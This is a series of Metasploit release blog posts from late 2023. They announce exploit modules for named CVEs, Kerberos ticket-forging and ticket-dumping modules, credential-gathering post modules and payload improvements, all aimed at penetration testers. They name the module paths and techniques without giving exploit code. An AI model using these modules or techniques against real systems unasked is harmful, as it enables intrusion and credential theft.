Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/12/29/metasploit-2023-wrap-up/

As 2023 winds down, we’re taking another look back at all the changes and improvements to the Metasploit Framework. This year marked the 20th anniversary since Metasploit version 1.0 was committed and the project is still actively maintained and improved thanks to a thriving community.

Version 6.3

Early this year in January, Metasploit version 6.3 was released with a number of improvements for targeting Active Directory environments. The crowning achievement of this effort was the integration of native Kerberos authentication. With this in place, HTTP, LDAP, MSSQL, SMB and WinRM modules can all make use of Kerberos authentication, enabling a swath of new attack techniques and workflows. In addition to the existing modules that are now capable of authenticating with Kerberos, multiple Kerberos-specific modules were added as well for a variety of tasks such as requesting tickets from the Key Distribution Center (aka the KDC which is almost always the Active Directory Domain Controller), forging tickets from known secrets, and inspecting the contents of tickets.

This functionality was highlighted in Black Hat USA’s Arsenal demonstrations, a recording of which can be found online.

Fetch Based Payloads

In May 2023, Metasploit released a new set of payloads, dubbed the Fetch Payloads which make exploitation of OS-command-executing vulnerabilities easier for users. At the time of the release, about two-thirds of exploits added to the Metasploit Framework in the previous year resulted in the execution of an OS command, either due to direct injection or via some other means such as deserialization. While OS command execution is becoming more popular, it often limits the type of payloads that can easily be added to an exploit since the most advanced payloads, including Meterpreter, aren’t available as OS commands.

Prior to the Fetch Payloads, exploit authors were burdened with the work necessary to convert Meterpreter payloads to something deliverable as an OS command. This led to extra work and inconsistent implementations that often lacked the flexibility our users desire. The new pattern uses the Fetch Payloads, which allows the Framework to handle this automatically. The result is less work for exploit developers and a higher degree of control for end users. We expect to see Fetch Payloads continue to be used widely well past 2024 and to have new variants added.

Even More Kerberos Improvements

While the Metasploit 6.3 release provided support for native Kerberos authentication for Metasploit, we’ve since built on it to add even more. These features didn’t make it into the original 6.3 release in January but have since shipped in weekly releases:

• The auxiliary/admin/kerberos/forge_ticket module was expanded to support the diamond and sapphire techniques in addition to the original golden and silver techniques.
• The auxiliary/admin/kerberos/forge_ticket module was also updated to account for the additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
• We added the post/windows/manage/kerberos_tickets post module, which enables users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
• The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Fewer DNS Leaks

One of the best features of Metasploit is the seamless way in which users can use established Meterpreter and SSH sessions to tunnel traffic as configured by the route command or often the post/multi/manage/autoroute module. Until this year, these connections would resolve hostnames to IP addresses from the system on which the Metasploit Framework was running, which could potentially leak information to listening parties. Thanks to a combined effort by sempervictus and smashery, Metasploit can now be configured to use a custom DNS server that is optionally accessed via an established session. This feature is currently behind a feature flag and requires users to run features set dns_feature true before it can be accessed.

Once enabled, the dns command allows users to configure how they would like to resolve DNS hostnames. Users can simply specify a single server to handle all queries, or use a wildcard syntax to send DNS queries for one domain to a specific server and non-matching queries to another. The weekly wrap up for the original release contains more detailed notes and usage examples.

Discoverability Improvements

A more recent change to the Framework brought a new feature to allow searching for more fields within modules. By enabling hierarchical search with features set hierarchical_search_table true, users will now find search queries that match module actions, targets, and AKA aliases. For example, this will cause the auxiliary/admin/kerberos/forge_ticket module to be included in the search results when forge_golden is the query because forging golden tickets is one of the actions that it supports.

Users can also discover new capabilities and how to use them by browsing our new docs site at docs.metasploit.com. This site’s source code is included within Metasploit itself, making it easy for users to contribute improvements and their own workflows.

Payload Improvements

Exploits are at the core of what we do on the Metasploit team, but they would be nothing without our payloads. This year saw multiple improvements to our payloads — some changes closed feature gaps, while others added net new functionality. Some highlights include:

• Smashery updated our Java Meterpreter payloads with an important fix to the loader to enable compatibility with the latest versions of OpenJDK.
• Salu90 added a new API to the Windows Meterpreter and a post module to use it that allows users to set the session’s token to a new value.
• JustAnda7 updated the Windows Meterpreter to display IPv6 routes for inspection when the user runs the Meterpreter route command (not to be confused with the Framework route command).
• Ishaanahuja7 added support to Meterpreter for running natively on Apple’s new ARM-based chips.
• Sempervictus added native sessions for AWS Instance connections and AWS SSM agents. These session types are noteworthy because while they require access tokens, they do not require a payload to be run on the target and can be used to open a session on a target that Metasploit is otherwise unable to communicate with.
• usiegl00 and Ishaanahuja7 both contributed enhancements to add support OSX AArch64 Meterpreter payloads, which enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Additionally, GitHub Actions are now being used to measure the feature coverage of the Meterpreter API commands. It’s a lesser-known fact that the Meterpreter payload has multiple implementations for different architectures and platforms. This means some features may be present in one and not another. This is the reason the Mimikatz kiwi plugin isn’t available when the java/meterpreter/reverse_tcp payload is used. To help us and the community track this information, a report including a coverage matrix is now generated automatically. This report can be accessed by navigating to the project’s Actions tab, selecting “Acceptance”, the latest run, and finally downloading the “final-report”.

Module Highlights

• CVE-2022-47966 – This particular vulnerability was an RCE in multiple ManageEngine products. A combined effort by cdelafuente-r7 and h00die-grey brought exploits for the ServiceDesk Plus, ADSelfService Plus, and Endpoint Central products.

• CVE-2023-34362 (Exploit) – The MOVEit exploit leverages one of the more high-profile vulnerabilities to have been released this year. This module exploits a SQL injection to leak sensitive data in order to upload a .NET deserialization payload which results in code execution in the context of NT AUTHORITY\ SYSTEM and was a combined effort by sfewer-r7, rbowes-r7, and bwatters-r7.

• CVE-2023-32560 (Exploit) – This vulnerability is an unauthenticated RCE in Ivanti Avalanche MDM that would result in code execution as NT AUTHORITY\SYSTEM. The module was submitted by EgeBalci and is one of the very few memory corruption exploits added this year.

• CVE-2023-46214 (Exploit) – Chocapikk made their first contributions this year, one of which is for an authenticated RCE in Splunk Enterprise.

• CVE-2023-22952
  (Exploit) – This exploit was contributed by community member h00die-gr3y back in January of 2023. While it may seem like old news nearly a year later, this zero-day gained a lot of attention when it first came to light. This exploit brought along with it new mixin capabilities for Metasploit to embed PHP payloads in PNG images. This opens the door for future exploit modules to drop payloads inside of PNGs with ease.

• CVE-2023-20887
  (Exploit) – This module was added by community contributor sinsinology (with help from community contributor h00die). There were a few Metasploit modules released this year that targeted VMware products; however this one stands out above the rest. Targeting the popular VMware Aria Operations for Networks software, this module enabled attackers to gain unauthenticated code execution in the context of the root user on a wide range of affected software versions.

• CVE-2023-27350
  (Exploit) – Speaking of modules written for celebrity vulnerabilities, let’s not leave out the PaperCut NG Authentication Bypass, brought to the framework by Metasploit’s one and only Christophe De La Fuente. Christophe’s contribution helped pen testers better assess the security of systems hosting PaperCut NG and ease the concerns of their clients during a stressful time in the cybersecurity ecosystem. The module exploits all affected versions of PaperCut NG and returns an elevated Meterpreter session.

• Post Module – Written by Spencer McIntyre of the Metasploit team, this module highlights the framework’s new, powerful Kerberos capabilities. Bringing along with it a large amount of railgun enhancements this module allows for Kerberos tickets to be exported from a compromised host and added to Metasploit’s own cache, allowing them to be used in subsequent attacks. The Kerberos work along with this module helps streamline many different types of attacks that can be performed in and around Domain environments. If you haven’t tested Metasploit’s Kerberos authentication capabilities yet, put it at the top of your todo list for 2024!

• CVE-2023-28252
  (Exploit) – The Common Log File System (CLFS) driver is a fantastic vector for attacks; it’s installed on all the latest versions of Windows and saw more abuse in 2023. Ransomware gangs exploited this vulnerability to gain SYSTEM level access on Windows 10, 11 and Server 2022. Metasploit team member Jack Heysel wrote this module that uses the Reflective DLL template in order to drop a low level PoC which returns a session running in the context of NT AUTHORITY\SYSTEM.

• CVE-2023-40044
  (Exploit) – Another exploit that made big waves this year was the WS_FTP server running the Ad Hoc Transfer module .NET deserialization vulnerability. The module and the initial research behind how the vulnerability actually works was brought to us by Metasploit’s very own, veteran contributor, Stephen Fewer. The exploit module runs reliably on a wide range of affected targets. Everyone loves a module where all you have to do is: select the module, input the IP address of the machine running the vulnerable software, run the module, and get a SYSTEM-level session.

Contributors

We would like to give a big thank you to all of the contributors who sent us code in 2023. Whether it was bug fixes, enhancements, or exploits, we appreciate the work you put into making Metasploit better. In 2023, we received pull requests from the following 75 people (ordered by count). Of these, 49 made their first contribution to Metasploit this year.

• h00die
• bcoles
• smashery
• h00die-gr3y
• jmartin-tech
• ErikWynter
• EgeBalci
• ismaildawoodjee (new in 2023)
• wvu
• jvoisin
• sempervictus
• rorymckinley (new in 2023)
• rad10
• manishkumarr1017 (new in 2023)
• Ryuuuuu (new in 2023)
• prabhatjoshi321 (new in 2023)
• Chocapikk (new in 2023)
• Jemmy1228 (new in 2023)
• AleksaZatezalo (new in 2023)
• emirpolatt (new in 2023)
• heyder
• steve-embling
• dm-ct (new in 2023)
• ide0x90
• archcloudlabs
• samsepi0x0 (new in 2023)
• Lorenyx (new in 2023)
• MikeAnast (new in 2023)
• loredous (new in 2023)
• bradyjackson (new in 2023)
• nfsec
• HynekPetrak
• whotwagner (new in 2023)
• rtpt-erikgeiser
• errorxyz (new in 2023)
• e-lliot (new in 2023)
• gcarmix (new in 2023)
• j0ev (new in 2023)
• xaitax (new in 2023)
• cudalac (new in 2023)
• bka-dev
• cnnrshd (new in 2023)
• pbarry25 (new in 2023)
• D00Movenok (new in 2023)
• gardnerapp (new in 2023)
• rodnt (new in 2023)
• hahwul (new in 2023)
• JustAnda7
• Guilhem7 (new in 2023)
• shellchocolat (new in 2023)
• sdcampbell (new in 2023)
• attl4s (new in 2023)
• distortedsignal (new in 2023)
• spmedia (new in 2023)
• YiDa858 (new in 2023)
• j-baines (new in 2023)
• catatonicprime
• vtoutain (new in 2023)
• SubcomandanteMeowcos (new in 2023)
• samueloph (new in 2023)
• araout42 (new in 2023)
• Pflegusch (new in 2023)
• tekwizz123
• rohitkumarankam (new in 2023)
• jeffmcjunkin
• MegaManSec
• bugch3ck
• raboof (new in 2023)
• JBince (new in 2023)
• Frycos (new in 2023)
• neterum (new in 2023)
• mkonda (new in 2023)
• serializingme (new in 2023)
• k0pak4
• npm-cesium137-io
• hamax97 (new in 2023)

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2023/12/22/metasploit-weekly-wrap-up-39/

Getting Looney with Privilege Escalation

As if Metasploit couldn’t get any loonier, this release adds a brand new exploit module for Glibc Tunables Privilege Escalation aka Looney Tunables. Now, using linux/local/glibc_tunables_priv_esc, you can check your target’s glibc version to see if it’s vulnerable to buffer overflow, as outlined in CVE-2023-4911. If so, the module will drop a python script and escalate your privilege to the root user, allowing you to execute malicious code. Happy Tuning!

New module content (3)

Vinchin Backup and Recovery Command Injection

Authors: Gregory Boddin (LeakIX) and Valentin Lobstein
Type: Exploit
Pull request: #18542 contributed by Chocapikk
Path: linux/http/vinchin_backup_recovery_cmd_inject

Description: This adds an exploit module for a command injection vulnerability in Vinchin Backup & Recovery versions v5.0, v6.0, v6.7, and v7.0. This leverages two vulnerabilities identified as CVE-2023-45499 and CVE-2023-45498.

Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)

Authors: Qualys Threat Research Unit, blasty [email protected], and jheysel-r7
Type: Exploit
Pull request: #18541 contributed by jheysel-r7
Path: linux/local/glibc_tunables_priv_esc

Description: This adds an exploit module for the "Looney Tunables" Linux LPE, identified as CVE-2023-4911. It checks the version of glibc running on the target to make sure it is vulnerable and, once verified, it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.

Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)

Authors: jheysel-r7
Type: Exploit
Pull request: #18566 contributed by jheysel-r7
Path: multi/http/atlassian_confluence_unauth_backup

Description:
This adds an exploit module for CVE-2023-22518, an Improper Authorization vulnerability in Confluence which allows an attacker to upload and restore a .zip backup file to the server containing a known user name and password. The attacker can then login with the credentials from the backup file to gain administrative access to the server.

Enhancements and features (2)

• #18622 from zeroSteiner – Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases.
• #18623 from gardnerapp – This updates the file handling of the generate command’s -o parameter to expand file system paths.

Bugs fixed (1)

• #18619 from adfoster-r7 – Fixed a crash when running the favorites command.

Documentation added (1)

• #18477 from AleksaZatezalo – This adds documentation for the auxiliary/scanner/nessus/nessus_rest_login module.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.47…6.3.48
• Full diff 6.3.47…6.3.48

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/15/metasploit-weekly-wrap-up-38/

Continuing the 12th Labor of Metasploit

Metasploit continues its Herculean task of increasing our toolset to tame Kerberos by adding support for AS_REP Roasting, which allows retrieving the password hashes of users who have Do not require Kerberos preauthentication set on the domain controller. The setting is disabled by default, but it is enabled in some environments.

Attackers can request the hash for any user with that option enabled, and worse (or better?) you can query the DC to determine which accounts have this setting, so not only can you get these hashes, the DC will tell you which users are vulnerable to the attack. Metasploit’s AS_REP roasting module will both gather the users and pull the authentication information, or pull information on a select set of users.

Ticket Management

This week’s release includes a brand new post module for enumerating and dumping Kerberos tickets from a compromised Windows host. This module will copy all of the tickets that are accessible based on the current privilege level to Metasploit’s own cache, where they can then be used in a Pass-The-Ticket (PTT) style attack. This notably enables Metasploit users to execute the entire workflow necessary to exploit Unconstrained Delegation right from with Metasploit, there’s even new documentation which outlines the entire process.

New module content (3)

Find Users Without Pre-Auth Required (ASREP-roast)

Author: smashery
Type: Auxiliary
Pull request: #18569 contributed by smashery
Path: gather/asrep

Description: This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms, brute forcing using a list of usernames or using a LDAP query to request the relevant usernames, followed by requesting TGTs.

Splunk Authenticated XSLT Upload RCE

Authors: Valentin Lobstein, h00die, and nathan
Type: Exploit
Pull request: #18577 contributed by Chocapikk
Path: unix/http/splunk_xslt_authenticated_rce

Description: This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.

Kerberos Ticket Management

Authors: Spencer McIntyre and Will Schroeder
Type: Post
Pull request: #18488 contributed by zeroSteiner
Path: windows/manage/kerberos_tickets

Description: This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit’s own cache, allowing them to be used for the duration in which they are valid.

Enhancements and features (3)

• #18539 from dwelch-r7 – This adds a new session type for SMB sessions. The smb session is behind a feature flag and can be enabled by setting features set smb_session_type true in msfconsole.
• #18598 from bwatters-r7 – :
  This bumps the Metasploit-payload version to bring in one fix and one enhancement. The fix is to standardize the behavior of Java Meterpreter to only listen on IPv4 interfaces when binding to 0.0.0.0. The enhancement is to better align pretty OS names on Windows for Windows Kernel 10 releases, AKA Windows server 2016-present or Windows 10/11+.
• #18601 from MikeAnast – Adds arm64 support to Metasploit’s Dockerfile. This new image is available from Dockerhub via docker pull metasploitframework/metasploit-framework:6.3.47 or through the wrapper script ./docker/bin/msfconsole.

Bugs fixed (4)

• #18606 from Lorenyx – rpc_plugin has been updated to correctly use the provided plugin options.
• #18609 from adfoster-r7 – This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.
• #18613 from dwelch-r7 – Ensures that after listing files within an SMB directory that the handle is closed.
• #18614 from sjanusz-r7 – Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.46…6.3.47
• Full diff 6.3.46…6.3.47

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2023/12/01/metasploit-weekly-wrap-up-37/

Customizable DNS resolution

Contributor smashery added a new dns command to Metasploit console, which allows the user to customize the behavior of DNS resolution. Similarly to the route command, it is now possible to specify where DNS requests should be sent to avoid any information leak. Before these changes, the Framework was using the default local system configuration. Now, it is possible to specify which DNS server should be queried based on rules that match specific hostnames or domains. It is also possible to route DNS requests through an existing session, which is useful when querying a DNS server located in an internal network we can only reach through a pivot host.

The DNS feature must be enabled to make this command available with features set dns_feature true. Then, use dns help to list the default commands:

msf6 > features set dns_feature true
dns_feature => true
msf6 > dns help
Manage Metasploit's DNS resolution behaviour

Usage:
  dns [add] [--session <session_id>] [--rule <wildcard DNS entry>] <IP Address> <IP Address> ...
  dns [remove/del] -i <entry id> [-i <entry id> ...]
  dns [purge]
  dns [print]

Subcommands:
  add - add a DNS resolution entry to resolve certain domain names through a particular DNS server
  remove - delete a DNS resolution entry; 'del' is an alias
  purge - remove all DNS resolution entries
  print - show all active DNS resolution entries

Examples:
  Display all current DNS nameserver entries
    dns
    dns print

  Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10
    route add --rule *.metasploit.com 192.168.1.10

  Add multiple entries at once
    route add --rule *.metasploit.com --rule *.google.com 192.168.1.10 192.168.1.11

  Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10, but specifically to go through session 2
    route add --session 2 --rule *.metasploit.com 192.168.1.10

  Delete the DNS resolution rule with ID 3
    route remove -i 3

  Delete multiple entries in one command
    route remove -i 3 -i 4 -i 5

  Set the DNS server(s) to be used for all requests that match no rules
    route add 8.8.8.8 8.8.4.4

Once set up, any name resolution will be performed according to these rules. For example, setting RHOSTS to a hostname with set RHOST www.example.com and a rule set with route add --session 1 --rule *.example.com 10.10.1.1 will force Framework to resolve the hostname sending a DNS request to the internal DNS server at 10.10.1.1 and through the session 1. No other requests will be sent to avoid information leak.

Tickets in the sky with diamond

Smashery also enhanced the existing Kerberos ticket-forging module and added support for Diamond and Sapphire techniques, which are similar to the Golden and Silver Tickets but stealthier. The Diamond technique consists in using a real TGT and modifies the PAC, assuming the krbtgt Kerberos keys is known. The Sapphire technique makes use of S4U2Self and U2U (User-to-User) to obtain the PAC of another user and assembling it with an existing TGT to impersonate him.

New module content (1)

WordPress Royal Elementor Addons RCE

Authors: Fioravante Souza and Valentin Lobstein
Type: Exploit
Pull request: #18567 contributed by Chocapikk
Path: multi/http/wp_royal_elementor_addons_rce

Description: This pull request adds a new exploit module for CVE-2023-5360, an unauthenticated file upload vulnerability in the WordPress Royal Elementor Addons and Templates plugin in versions before 1.3.79.

Enhancements and features (5)

• #18526 from smashery – This adds a new dns command in Metasploit, to allow the user to customize the behavior of DNS resolution in the framework. DNS resolution can be set to be routed through a session via a specific Comm channel or to request a specific DNS server. Routing rules ensure DNS queries are not sent to unwanted DNS servers and avoid the leak of information.
• #18560 from smashery – This updates the existing Kerberos ticket-forging module with new actions for forging tickets with fields copied from ones issued by the legitimate KDC using the Diamond and Sapphire techniques.
• #18565 from zeroSteiner – This adds an enhancement to adjust the kerberos cache lookup logic. If no TGT for the specific host is found, it will try again but with any host. This fixes the workflow where a user can currently forge a golden ticket, but that ticket will not be automatically used for authentication by other services. This will also fix the future issue of the TGT that’s created by the Diamond and Sapphire techniques.
• #18571 from smashery – Improves the error messages shown to users if there is a validation error with a module’s RHOST datastore values. Now, the user is notified when there is a failure with parsing a URL, invalid CIDR, or DNS resolution failure.
• #18580 from adfoster-r7 – Metasploit modules developed using Python can now provide default_options as part of an exploit.

Bugs fixed (1)

• #18579 from zeroSteiner – This converts the module to use the new style of Windows version detection that was added in https://github.com/rapid7/metasploit-framework/pull/17336. This will become more important once the Windows Meterpreter returns a more accurate string for the sysinfo OS field.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.44…6.3.45
• Full diff 6.3.44…6.3.45

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/11/23/metasploit-wrapup-74/

Enhancements and features (2)

• #18548 from zeroSteiner – Updates the admin/http/tomcat_ghostcat module to follow newer library conventions.
• #18552 from adfoster-r7 – Adds support for Ruby 3.3.0-preview3.

Bugs fixed (5)

• #18448 from HynekPetrak – Fixes and updates the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass module to use renamed NEW_USERNAME and NEW_PASSWORD options.
• #18538 from adfoster-r7 – Fixes an intermittent stream closed in another thread crash when booting msfconsole.
• #18547 from adfoster-r7 – This fixes an issue in the platform detection used by the SSH login modules that was causing certain Windows environments to be incorrectly fingerprinted.
• #18558 from zeroSteiner – Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome.
• #18564 from zeroSteiner – Fixes a module crash when running the auxiliary/server/capture/http module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.43…6.3.44
• Full diff 6.3.43…6.3.44

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/11/17/metasploit-weekly-wrap-up-36/

Possible Web Service Removal

Metasploit has support for running with a local database, or from a remote web service which can be initialized with msfdb init --component webservice. Future versions of Metasploit Framework may remove the msfdb remote webservice. Users that leverage this functionality are invited to react on an issue currently on GitHub to inform the maintainers that the feature is used.

New module content (1)

ZoneMinder Snapshots Command Injection

Authors: UnblvR and whotwagner
Type: Exploit
Pull request: #18434 contributed by whotwagner
Path: unix/webapp/zoneminder_snapshots

Description: This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).

Enhancements and features (1)

• #18440 from adfoster-r7 – This alerts users that the remote web service will be removed. It prompts them to respond to an issue on GitHub if the removal will affect them.

Bugs fixed (1)

• #18532 from adfoster-r7 – Fixes db2 scanner module crashes.

Documentation added (1)

• #18524 from bradyjackson – Updates the modules/payload/android/meterpreter/reverse_tcp.md example to use the correct flags when generating a payload.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.42…6.3.43
• Full diff 6.3.42…6.3.43

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/11/10/metasploit-weekly-wrap-up-35/

Apache MQ and Three Cisco Modules in a Trenchcoat

This week’s release has a lot of new content and features modules targeting two major recent vulnerabilities that got a great deal of attention: CVE-2023-46604 targeting Apache MQ resulting in ransomware deployment and CVE-2023-20198 targeting Cisco IOS XE OS.

New module content (8)

Cisco IOS-XE unauthenticated Command Line Interface (CLI) execution

Author: sfewer-r7
Type: Auxiliary
Pull request: #18507 contributed by sfewer-r7
Path: admin/http/cisco_ios_xe_cli_exec_cve_2023_20198

Description: This PR adds three modules: auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution, module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution, and exploit/linux/misc/cisco_ios_xe_rce uses the same two vulnerabilities to run an arbitrary payload on the target.

MagnusBilling application unauthenticated Remote Command Execution.

Authors: Eldstal and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18481 contributed by h00die-gr3y
Path: linux/http/magnusbilling_unauth_rce_cve_2023_30258

Description: This adds an exploit module that leverages CVE-2023-30258, a command injection vulnerability in MagnusBilling versions 6 and 7 that allows unauthenticated remote code execution in the context of the user running the web server process.

Apache ActiveMQ Unauthenticated Remote Code Execution

Authors: X1r0z and sfewer-r7
Type: Exploit
Pull request: #18501 contributed by sfewer-r7
Path: multi/misc/apache_activemq_rce_cve_2023_46604

Description: This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ.

AjaxPro Deserialization Remote Code Execution

Authors: Hans-Martin Münch (MOGWAI LABS) and Jemmy Wang
Type: Exploit
Pull request: #18494 contributed by Jemmy1228
Path: windows/http/ajaxpro_deserialization_rce

Description: This PR adds an RCE module for AjaxPro which leverages an insecure deserialization of data to get remote code execution on the target OS in the context of the user running the website which utilized AjaxPro.

Apache NiFi Credentials Gather

Authors: Topaco and h00die
Type: Post
Pull request: #18503 contributed by h00die
Path: linux/gather/apache_nifi_credentials

Description: This PR adds a post module to steal config and credential information for Apache NiFi.

Windows Gather PL/SQL Developer Connection Credentials

Authors: Adam Caudill and Jemmy Wang
Type: Post
Pull request: #18491
Path: windows/gather/credentials/plsql_developer

Description: Unable to find PR information, please complete manually

Enhancements and features (3)

• #18218 from gardnerapp – This PR reduces the number of requests the Windows checkvm post module sends to the host when attempting to determine what hypervisor the session is running in by saving the initial responses in instance variables for later use in the module. The PR also includes many other general code improvements.
• #18379 from dwelch-r7 – This PR improves the Kerberos service authenticator hostname matching for ccache credentials. Prior to this change the service authenticator was filtering out valid credentials when the hostname wasn’t an exact match when credentials for a domain (i.e. windomain.local) should work on a subdomain (i.e. dc.windomain.local).
• #18504 from h00die – Updates the auxiliary/scanner/http/grafana_plugin_traversal module to include a disclosure date and a link to the original disclosure blog post.

Bugs fixed (1)

• #18506 from zeroSteiner – This PR fixes a stability issue with the f5_bigip_tmui_rce_cve_2023_46747 module. Prior to this fix, occasionally the module would fail on login as things were running too quickly. The module now retries logging in if the first attempt fails.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.41…6.3.42
• Full diff 6.3.41…6.3.42

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/11/03/metasploit-weekly-wrap-up-34/

PTT for DCSync

This week, community member smashery made an improvement to the windows_secrets_dump module to enable it to dump domain hashes using the DCSync method after having authenticated with a Kerberos ticket. Now, if a user has a valid Kerberos ticket for a privileged account, they can run the windows_secrets_dump module with the DOMAIN action and obtain the desired information. No password required. This is particularly useful in workflows involving the exploitation of AD/CS, using the ESC family of techniques.

New module content (2)

Citrix ADC (NetScaler) Bleed Scanner

Authors: Dylan Pindur and Spencer McIntyre
Type: Auxiliary
Pull request: #18492 contributed by zeroSteiner
Path: scanner/http/citrix_bleed_cve_2023_4966

Description: This adds a scanner module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies which can be hijacked if found.

F5 BIG-IP TMUI AJP Smuggling RCE

Authors: Michael Weber, Sandeep Singh, Spencer McIntyre, and Thomas Hendrickson
Type: Exploit
Pull request: #18497 contributed by zeroSteiner
Path: linux/http/f5_bigip_tmui_rce_cve_2023_46747

Description: This module exploits a flaw in F5s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.

Enhancements and features (3)

• #18386 from e-lliot – :
  This adds the lmkdir command to Meterpreter, which creates a directory on the local host.
• #18441 from sjanusz-r7 – Adds at rest encryption to Meterpreter payloads on the Metasploit host machine’s file system.
• #18419 from smashery – This updates the windows_secrets_dump module’s DCSync technique (the DOMAIN action) to use Kerberos tickets for authentication. Users can now use Kerberos tickets for authentication with all actions in the module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.40…6.3.41
• Full diff 6.3.40…6.3.41

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/10/27/metasploit-weekly-wrap-up-33/

New module content (4)

Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control

Authors: Emir Polat and Unknown
Type: Auxiliary
Pull request: #18447 contributed by emirpolatt
Path: admin/http/atlassian_confluence_auth_bypass
AttackerKB reference: CVE-2023-22515

Description: This adds an exploit for CVE-2023-22515, which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.

VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure

Authors: Harsh Jaiswal ( <Harsh Jaiswal (@rootxharsh)>, Rahul Maini ( <Rahul Maini (@iamnoooob)>, SinSinology, and h00die
Type: Exploit
Pull request: #18460 contributed by h00die
Path: linux/ssh/vmware_vrni_known_privkey

Description: This adds a new exploit module that leverages the fact that SSH keys on VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0 are not randomized on initialization. It tries all the default SSH keys until one succeeds and gains unauthorized remote access as the "support" (root) user.

Splunk "edit_user" Capability Privilege Escalation

Authors: Heyder Andrade, Mr Hack (try_to_hack) Santiago Lopez, and Redway Security <redwaysecurity.com>
Type: Exploit
Pull request: #18348 contributed by heyder
Path: multi/http/splunk_privilege_escalation_cve_2023_32707

